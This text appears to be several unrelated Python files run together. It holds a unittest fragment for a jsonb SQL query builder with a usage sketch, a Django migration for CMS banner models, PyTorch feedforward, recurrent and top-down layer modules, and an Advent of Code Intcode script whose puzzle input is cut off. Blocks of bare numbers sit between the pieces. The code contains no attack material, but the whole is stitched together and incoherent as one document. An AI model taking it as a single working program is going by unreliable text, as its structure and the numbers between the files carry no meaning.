self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' NOT LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'molecular_formula', 'property_value_0': u'%c14h21n3o2%'}, self.builder.bind_params)
def testQueryCompound(self):
query = self.builder.build_query('"mass" > 30 OR ~"probability" !~ "LOW"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s) OR (elems->>'x' LIKE %(property_term_1)s AND elems->>'y' NOT LIKE %(property_value_1)s)", query)
self.assertEquals({
'property_term_0': u'mass',
'property_value_0': u'30',
'property_term_1': u'%probability%',
'property_value_1': u'%low%',
}, self.builder.bind_params)
query = self.builder.build_query('"STATUS" or ~"NAME" or "CODE"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s) OR (elems->>'y' LIKE %(property_term_1)s) OR (elems->>'y' = %(property_term_2)s)", query)
self.assertEquals({
'property_term_0': u'status',
'property_term_1': u'%name%',
'property_term_2': u'code',
}, self.builder.bind_params)
query = self.builder.build_query('logP > 2 and StdDev < 0.5')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s))\n inner join {1} t1 on str.s = t1.s\n inner join jsonb_array_elements(t1.p) elems_t1 on ((elems_t1->>'x' LIKE %(property_term_1)s AND jsonb_typeof(elems_t1->'y') = 'number' AND (elems_t1->>'y')::float < %(property_value_1)s)", query)
self.assertEquals({
'property_term_0': u'%logp%',
'property_term_1': u'%stddev%',
'property_value_0': u'2',
'property_value_1': u'0.5',
}, self.builder.bind_params)
if __name__ == '__main__':
unittest.main()
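# --- Usage sketch based only on the behaviour exercised by the tests above ---
# QueryBuilder and its bind_params attribute come from the query module in this
# repo; the psycopg2-style execution mentioned at the end is an assumption
# about the surrounding service, not shown in this file.
from query import QueryBuilder

builder = QueryBuilder()
sql_fragment = builder.build_query('"mass" > 30 OR ~"probability" !~ "LOW"')

# sql_fragment is a parameterized predicate over the jsonb `elems` pairs, and
# builder.bind_params maps placeholder names to values, e.g.
#   {'property_term_0': 'mass', 'property_value_0': '30', ...}
# which could then be passed alongside the full query to a psycopg2-style
# cursor.execute call.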
| 65.355769
| 427
| 0.648521
| 913
| 6,797
| 4.582694
| 0.085433
| 0.131931
| 0.118069
| 0.095363
| 0.821224
| 0.778203
| 0.756692
| 0.747132
| 0.734465
| 0.669455
| 0
| 0.03637
| 0.166691
| 6,797
| 103
| 428
| 65.990291
| 0.702331
| 0
| 0
| 0.234568
| 0
| 0.185185
| 0.496101
| 0.09107
| 0
| 0
| 0
| 0
| 0.469136
| 1
| 0.049383
| false
| 0
| 0.024691
| 0
| 0.08642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a172e9b6fb45ef5766e0125c2aac0f55dcaa4846
| 9,978
|
py
|
Python
|
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
cms/migrations/0001_initial.py
|
Parveen3300/Reans
|
6dfce046b01099284a8c945a04600ed83e5099a4
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2.8 on 2021-11-15 05:11
import ckeditor.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalogue', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='WebsiteCompanyLogo',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('logo_title', models.CharField(max_length=30, verbose_name='Home Name')),
('logo_image', models.ImageField(upload_to='company/logo_images', verbose_name='Logo Image (small)')),
('logo_image_large', models.ImageField(upload_to='company/logo_images_large', verbose_name='Logo Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_websitecompanylogos', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_websitecompanylogos', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ProductBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Banner Name')),
('banner_image', models.ImageField(upload_to='product/banner_images', verbose_name='Banner Image (small)')),
('banner_image_large', models.ImageField(upload_to='product/banner_images_large', verbose_name='Banner Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_productbanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_productbanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='HomePageBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Home Name')),
('banner_image', models.ImageField(upload_to='product/banner_images', verbose_name='Home Image (small)')),
('banner_image_large', models.ImageField(upload_to='product/banner_images_large', verbose_name='Home Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_homepagebanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_homepagebanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='DealOfTheDayProduct',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('title', models.CharField(max_length=30, verbose_name='Home Name')),
('image', models.ImageField(blank=True, null=True, upload_to='company/images', verbose_name='Logo Image')),
('short_description', models.TextField()),
('content', ckeditor.fields.RichTextField(blank=True, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_dealofthedayproducts', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('product', models.ForeignKey(blank=True, limit_choices_to={'is_active': '1'}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='deal_product', to='catalogue.product', verbose_name='Deal Products')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_dealofthedayproducts', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CompanyBanner',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('banner_title', models.CharField(max_length=30, verbose_name='Banner Name')),
('banner_image', models.ImageField(upload_to='company/banner_images', verbose_name='Banner Image (small)')),
('banner_image_large', models.ImageField(upload_to='company/banner_images_large', verbose_name='Banner Image (large)')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_companybanners', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_companybanners', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Company Banner',
'verbose_name_plural': 'Company Banner',
'db_table': 'company_banner',
},
),
]
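# --- Hypothetical sketch (not part of the migration above) ---
# The five CreateModel operations repeat the same audit and SEO columns; the
# abstract base class below is one way those fields could be generated. The
# class name and module are assumptions; the actual cms.models source is not
# part of this file.
from django.db import models

class CmsAuditBase(models.Model):  # assumed name, not from the repository
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    is_active = models.BooleanField(default=True)
    meta_title = models.CharField(max_length=250, blank=True, null=True,
                                  verbose_name='Meta Title')
    meta_description = models.TextField(blank=True, null=True,
                                        verbose_name='Meta Description')
    keywords = models.CharField(max_length=250, blank=True, null=True,
                                verbose_name='Keyword')

    class Meta:
        abstract = True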
| 80.467742
| 323
| 0.655642
| 1,157
| 9,978
| 5.401037
| 0.095938
| 0.082733
| 0.032645
| 0.045607
| 0.881101
| 0.87374
| 0.87294
| 0.855977
| 0.829733
| 0.822852
| 0
| 0.00999
| 0.197434
| 9,978
| 123
| 324
| 81.121951
| 0.770355
| 0.00451
| 0
| 0.568966
| 1
| 0
| 0.213775
| 0.041587
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1c2fd1c5388c84a00896d9e5e762075c580cf03
| 9,868
|
py
|
Python
|
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
models/triple_layer.py
|
mabdelhack/cnn_recurrent_topdown
|
0c4a15abb34fcbed98e3ea3a23dd11c3d9bca896
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class TripleLayerConv(nn.Module):
def __init__(self, input_channels, output_channels, topdown_channels, feedforward_recurrent_parameters,
topdown_parameters, dropout=None):
"""This is a unit that contains triple convolutional/conv_transpose layers to implement feedforward, recurrent,
and top-down processing of images"""
super(TripleLayerConv, self).__init__()
# save some parameters for later
self.input_channels = input_channels
self.output_channels = output_channels
self.feedforward_parameters = feedforward_recurrent_parameters
self.dropout = dropout
# Model parameters based on inputs
activation_function = {
'relu': nn.ReLU(),
'elu': nn.ELU(),
'leaky_relu': nn.LeakyReLU(),
'tanh': nn.Tanh()
}
self.feedforward_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.recurrent_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.topdown_activation = activation_function[topdown_parameters['activation']]
self.feedforward_layer = nn.Conv2d(input_channels, output_channels,
kernel_size=feedforward_recurrent_parameters['kernel_size'],
stride=feedforward_recurrent_parameters['stride'],
padding=feedforward_recurrent_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
self.recurrent_layer = nn.ConvTranspose2d(output_channels, input_channels,
kernel_size=feedforward_recurrent_parameters['kernel_size'],
stride=feedforward_recurrent_parameters['stride'],
padding=feedforward_recurrent_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
self.topdown_layer = nn.ConvTranspose2d(topdown_channels, input_channels,
kernel_size=topdown_parameters['kernel_size'],
stride=topdown_parameters['stride'],
padding=topdown_parameters['padding'],
dilation=1, groups=1, bias=True, padding_mode='zeros')
def forward(self, input_data, feedforward_flag=True, recurrent_flag=True, topdown_flag=True, data_size=None):
"""This supports any of the combinations between feedforward, recurrent, top_down by turning on an off
any of the flags for that pathway. It can even go in a backward direction if the feedforward flag is turned
off and data_size is given. Input data should be a list of three inputs in full mode where feedforward input
is the first element, recurrent is second and top-down is third. In case of absence of feedforward with any of
the later inputs presence, any placeholder should be inserted in its place. Same goes for absence of recurrent
input and presence of top-down."""
# print('feedforward = {}'.format(feedforward_flag))
# print('recurrent = {}'.format(recurrent_flag))
# print('topdown = {}'.format(topdown_flag))
if feedforward_flag:
x_feedforward = input_data[0]
else:
x_feedforward = torch.zeros(data_size)
if (recurrent_flag and input_data[1].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_feedforward = x_feedforward.cuda()
if recurrent_flag:
x_recurrent = input_data[1]
x_recurrent = self.recurrent_activation(self.recurrent_layer(x_recurrent))
else:
x_recurrent = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_recurrent = x_recurrent.cuda()
if topdown_flag:
x_topdown = input_data[2]
if len(x_topdown.shape) < 3:
x_topdown = x_topdown.contiguous().view(-1, x_topdown.shape[-1], 1, 1)
x_topdown = self.topdown_activation(self.topdown_layer(x_topdown))
else:
x_topdown = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (recurrent_flag and input_data[1].is_cuda):
x_topdown = x_topdown.cuda()
# print('feedforward cuda = {}'.format(x_feedforward.is_cuda))
# print('recurrent cuda = {}'.format(x_recurrent.is_cuda))
# print('topdown cuda = {}'.format(x_topdown.is_cuda))
x = x_feedforward + x_recurrent + x_topdown
output = self.feedforward_activation(self.feedforward_layer(x))
if self.dropout is not None:
output = nn.Dropout(0.5)(output)
return output, x_recurrent, x_topdown
def output_size(self, input_size):
"""Assuming square kernels"""
assert input_size[0] == self.input_channels
width_height = ((input_size[1] +
2 * self.feedforward_parameters['padding']
- self.feedforward_parameters['kernel_size'])
/ self.feedforward_parameters['stride']) + 1
width_height = int(width_height)
return [self.output_channels, width_height, width_height]
@staticmethod
def __name__():
return 'TripleLayerConv'
class TripleLayerFc(nn.Module):
def __init__(self, input_channels, output_channels, topdown_channels, feedforward_recurrent_parameters,
topdown_parameters, dropout=None):
"""This is a unit that contains triple fully-connected layers to implement feedforward, recurrent,
and top-down processing of 1-D data"""
super(TripleLayerFc, self).__init__()
# save some parameters for later
self.input_channels = input_channels
self.output_channels = output_channels
self.dropout = dropout
# Model parameters based on inputs
activation_function = {
'relu': nn.ReLU(),
'elu': nn.ELU(),
'leaky_relu': nn.LeakyReLU(),
'tanh': nn.Tanh(),
'softmax': nn.Softmax(dim=1),
'none': nn.Identity()
}
self.feedforward_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.recurrent_activation = activation_function[feedforward_recurrent_parameters['activation']]
self.topdown_activation = activation_function[topdown_parameters['activation']]
self.feedforward_layer = nn.Linear(input_channels, output_channels)
self.recurrent_layer = nn.Linear(output_channels, input_channels)
self.topdown_layer = nn.Linear(topdown_channels, input_channels)
def forward(self, input_data, feedforward_flag=True, recurrent_flag=True, topdown_flag=True, data_size=None):
"""This supports any of the combinations between feedforward, recurrent, top_down by turning on an off
any of the flags for that pathway. It can even go in a backward direction if the feedforward flag is turned
off and data_size is given. Input data should be a list of three inputs in full mode where feedforward input
is the first element, recurrent is second and top-down is third. In case of absence of feedforward with any of
the later inputs presence, any placeholder should be inserted in its place. Same goes for absence of recurrent
input and presence of top-down."""
# print('feedforward = {}'.format(feedforward_flag))
# print('recurrent = {}'.format(recurrent_flag))
# print('topdown = {}'.format(topdown_flag))
if feedforward_flag:
x_feedforward = input_data[0]
else:
x_feedforward = torch.zeros(data_size)
if (recurrent_flag and input_data[1].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_feedforward = x_feedforward.cuda()
if len(x_feedforward.shape) > 2:
x_feedforward = x_feedforward.contiguous().view(-1, self.input_channels)
if recurrent_flag:
x_recurrent = input_data[1]
x_recurrent = self.recurrent_activation(self.recurrent_layer(x_recurrent))
else:
x_recurrent = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (topdown_flag and input_data[2].is_cuda):
x_recurrent = x_recurrent.cuda()
if topdown_flag:
x_topdown = input_data[2]
x_topdown = self.topdown_activation(self.topdown_layer(x_topdown))
else:
x_topdown = torch.zeros(x_feedforward.shape)
if (feedforward_flag and input_data[0].is_cuda) or (recurrent_flag and input_data[1].is_cuda):
x_topdown = x_topdown.cuda()
# print('feedforward cuda = {}'.format(x_feedforward.is_cuda))
# print('recurrent cuda = {}'.format(x_recurrent.is_cuda))
# print('topdown cuda = {}'.format(x_topdown.is_cuda))
x = x_feedforward + x_recurrent + x_topdown
output = self.feedforward_activation(self.feedforward_layer(x))
if self.dropout is not None:
output = nn.Dropout(0.5)(output)
return output, x_recurrent, x_topdown
def output_size(self, input_size):
"""Assuming square kernels"""
assert input_size[0] == self.input_channels
return [self.output_channels]
@staticmethod
def __name__():
return 'TripleLayerFc'
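# --- Usage sketch (not part of the module above) ---
# Illustrative sizes only; the parameter dictionaries follow the keys the
# constructors above read, and torch is already imported at the top of this
# file. Everything else is an assumption.
ff_params = {'activation': 'relu', 'kernel_size': 3, 'stride': 1, 'padding': 1}
td_params = {'activation': 'relu', 'kernel_size': 3, 'stride': 1, 'padding': 1}

layer = TripleLayerConv(input_channels=3, output_channels=8, topdown_channels=8,
                        feedforward_recurrent_parameters=ff_params,
                        topdown_parameters=td_params)

x_ff = torch.zeros(1, 3, 32, 32)   # feedforward input
x_rec = torch.zeros(1, 8, 32, 32)  # recurrent input (shape of the layer output)
x_td = torch.zeros(1, 8, 32, 32)   # top-down input

# All three pathways enabled; the layer returns the new output plus the
# transformed recurrent and top-down contributions.
out, x_recurrent, x_topdown = layer([x_ff, x_rec, x_td])
assert list(out.shape) == [1, 8, 32, 32]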
| 50.605128
| 119
| 0.639137
| 1,139
| 9,868
| 5.287972
| 0.127305
| 0.032874
| 0.064752
| 0.031878
| 0.836626
| 0.829321
| 0.829321
| 0.829321
| 0.829321
| 0.829321
| 0
| 0.006286
| 0.274524
| 9,868
| 194
| 120
| 50.865979
| 0.835033
| 0.224666
| 0
| 0.726563
| 0
| 0
| 0.033569
| 0
| 0
| 0
| 0
| 0
| 0.015625
| 1
| 0.0625
| false
| 0
| 0.015625
| 0.015625
| 0.140625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62e39f68632f51c49d1f8271a8b1e400236bb589
| 6,811
|
py
|
Python
|
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
] | null | null | null |
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
] | null | null | null |
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
] | null | null | null |
import sys
import unittest
from intcode import Machine
INPUT = "1,380,379,385,1008,2119,168858,381,1005,381,12,99,109,2120,1102,1,0,383,1102,0,1,382,21001,382,0,1,21002,383,1,2,21101,37,0,0,1105,1,578,4,382,4,383,204,1,1001,382,1,382,1007,382,37,381,1005,381,22,1001,383,1,383,1007,383,20,381,1005,381,18,1006,385,69,99,104,-1,104,0,4,386,3,384,1007,384,0,381,1005,381,94,107,0,384,381,1005,381,108,1106,0,161,107,1,392,381,1006,381,161,1101,0,-1,384,1106,0,119,1007,392,35,381,1006,381,161,1102,1,1,384,21001,392,0,1,21101,0,18,2,21101,0,0,3,21102,138,1,0,1105,1,549,1,392,384,392,21001,392,0,1,21102,18,1,2,21102,1,3,3,21102,1,161,0,1106,0,549,1101,0,0,384,20001,388,390,1,21001,389,0,2,21102,180,1,0,1105,1,578,1206,1,213,1208,1,2,381,1006,381,205,20001,388,390,1,20102,1,389,2,21102,1,205,0,1105,1,393,1002,390,-1,390,1102,1,1,384,21002,388,1,1,20001,389,391,2,21101,228,0,0,1105,1,578,1206,1,261,1208,1,2,381,1006,381,253,21002,388,1,1,20001,389,391,2,21101,253,0,0,1106,0,393,1002,391,-1,391,1102,1,1,384,1005,384,161,20001,388,390,1,20001,389,391,2,21101,279,0,0,1106,0,578,1206,1,316,1208,1,2,381,1006,381,304,20001,388,390,1,20001,389,391,2,21101,0,304,0,1106,0,393,1002,390,-1,390,1002,391,-1,391,1101,1,0,384,1005,384,161,21001,388,0,1,20102,1,389,2,21101,0,0,3,21102,338,1,0,1105,1,549,1,388,390,388,1,389,391,389,20102,1,388,1,21002,389,1,2,21102,4,1,3,21101,0,365,0,1105,1,549,1007,389,19,381,1005,381,75,104,-1,104,0,104,0,99,0,1,0,0,0,0,0,0,270,16,15,1,1,18,109,3,22102,1,-2,1,22102,1,-1,2,21101,0,0,3,21101,0,414,0,1105,1,549,21202,-2,1,1,22101,0,-1,2,21101,429,0,0,1106,0,601,2102,1,1,435,1,386,0,386,104,-1,104,0,4,386,1001,387,-1,387,1005,387,451,99,109,-3,2105,1,0,109,8,22202,-7,-6,-3,22201,-3,-5,-3,21202,-4,64,-2,2207,-3,-2,381,1005,381,492,21202,-2,-1,-1,22201,-3,-1,-3,2207,-3,-2,381,1006,381,481,21202,-4,8,-2,2207,-3,-2,381,1005,381,518,21202,-2,-1,-1,22201,-3,-1,-3,2207,-3,-2,381,1006,381,507,2207,-3,-4,381,1005,381,540,21202,-4,-1,-1,22201,-3,-1,-3,2207,-3,-4,381,1006,381,529,22102,1,-3,-7,109,-8,2105,1,0,109,4,1202,-2,37,566,201,-3,566,566,101,639,566,566,1202,-1,1,0,204,-3,204,-2,204,-1,109,-4,2105,1,0,109,3,1202,-1,37,593,201,-2,593,593,101,639,593,593,21002,0,1,-2,109,-3,2106,0,0,109,3,22102,20,-2,1,22201,1,-1,1,21102,1,373,2,21102,642,1,3,21101,0,740,4,21102,1,630,0,1106,0,456,21201,1,1379,-2,109,-3,2106,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,2,2,2,0,2,2,2,2,2,2,0,0,2,2,2,2,2,2,2,2,2,2,2,0,0,2,2,0,0,0,2,0,1,1,0,2,2,0,0,2,0,2,0,0,0,2,2,2,2,2,2,0,2,2,2,2,2,2,0,2,2,0,2,0,2,0,2,2,0,1,1,0,2,2,0,2,0,2,2,2,2,2,0,0,0,0,2,0,2,2,0,2,0,2,2,2,0,0,2,2,2,2,2,0,2,0,1,1,0,2,0,0,0,2,2,0,2,2,2,2,0,2,2,2,2,2,2,0,2,2,0,2,2,2,2,2,2,2,0,2,2,0,0,1,1,0,0,0,0,2,0,2,2,2,0,0,2,2,2,2,2,2,0,0,2,0,0,2,2,2,2,2,2,2,2,2,2,2,2,0,1,1,0,0,0,2,2,2,0,2,2,2,0,2,2,2,0,2,2,2,0,2,0,2,0,2,0,2,2,2,2,0,2,0,2,2,0,1,1,0,2,0,2,2,2,2,0,2,0,0,0,0,2,2,2,2,2,0,0,0,2,2,2,2,0,2,2,2,0,0,0,2,2,0,1,1,0,2,0,0,2,0,0,2,2,0,2,2,2,2,2,2,0,2,0,2,2,2,2,2,0,2,2,0,2,2,2,2,2,2,0,1,1,0,2,2,2,2,2,0,2,2,2,2,2,0,2,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,2,0,0,0,0,1,1,0,2,2,0,2,2,2,2,2,2,2,2,2,2,0,2,0,2,2,0,0,2,0,2,2,2,2,2,2,2,2,2,2,2,0,1,1,0,0,0,0,2,0,2,2,2,0,2,0,0,2,2,2,0,2,2,0,2,2,2,2,2,0,2,2,2,2,2,0,2,0,0,1,1,0,2,2,0,0,2,0,2,0,0,0,0,2,0,2,2,2,2,0,0,0,2,2,0,0,2,2,2,0,2,2,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1
,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,27,7,12,9,29,89,22,25,56,68,11,72,19,45,14,13,78,3,69,94,27,9,49,28,71,46,36,48,68,13,97,58,28,79,14,17,54,51,27,52,90,90,3,20,46,50,15,13,15,12,56,49,24,85,68,84,48,19,74,5,70,9,64,50,53,5,63,54,90,67,74,95,40,39,25,91,48,87,66,36,17,18,48,24,81,86,24,63,36,29,48,23,19,43,34,97,78,94,51,49,41,47,33,65,76,97,34,78,90,54,20,38,15,78,75,40,60,31,89,98,57,52,39,89,27,51,67,92,75,24,14,26,40,84,22,49,36,8,80,6,69,46,83,80,70,34,29,39,82,26,72,29,47,33,48,92,8,89,49,96,39,13,33,75,48,63,62,71,49,17,57,95,96,34,35,73,53,48,55,95,47,93,80,90,67,32,69,52,15,12,42,62,48,37,80,72,79,37,24,24,77,12,94,62,29,36,32,98,55,82,17,73,26,29,88,21,94,73,30,41,46,65,25,9,67,85,40,92,20,33,55,75,78,44,61,64,41,84,44,21,25,41,95,26,6,43,29,7,31,79,1,93,23,89,25,47,24,57,44,66,83,1,7,11,44,73,96,24,71,66,47,17,42,71,82,5,65,52,18,20,90,85,57,32,80,10,60,65,13,32,51,68,29,67,84,28,13,53,44,41,69,84,76,31,31,57,74,51,44,16,49,80,71,29,78,53,94,60,24,57,9,76,12,54,65,32,30,72,2,91,98,29,28,91,7,84,24,18,12,79,11,34,51,18,98,3,68,38,15,82,53,56,57,18,50,61,95,15,63,3,17,66,80,29,56,4,42,57,82,84,35,8,15,47,4,20,5,50,51,50,48,20,67,77,51,91,81,83,3,79,44,71,82,48,45,43,27,28,42,15,89,21,6,8,80,14,7,90,46,15,90,54,14,1,40,42,78,82,53,82,11,54,95,57,81,29,52,35,86,72,26,54,24,40,22,50,31,33,6,23,45,57,77,43,21,40,84,57,12,67,3,31,90,16,10,64,38,97,59,15,80,44,36,61,33,89,38,67,14,91,34,16,37,77,69,60,58,53,19,79,90,79,4,68,60,4,39,33,8,50,61,5,29,39,65,72,70,34,56,74,21,58,73,20,95,63,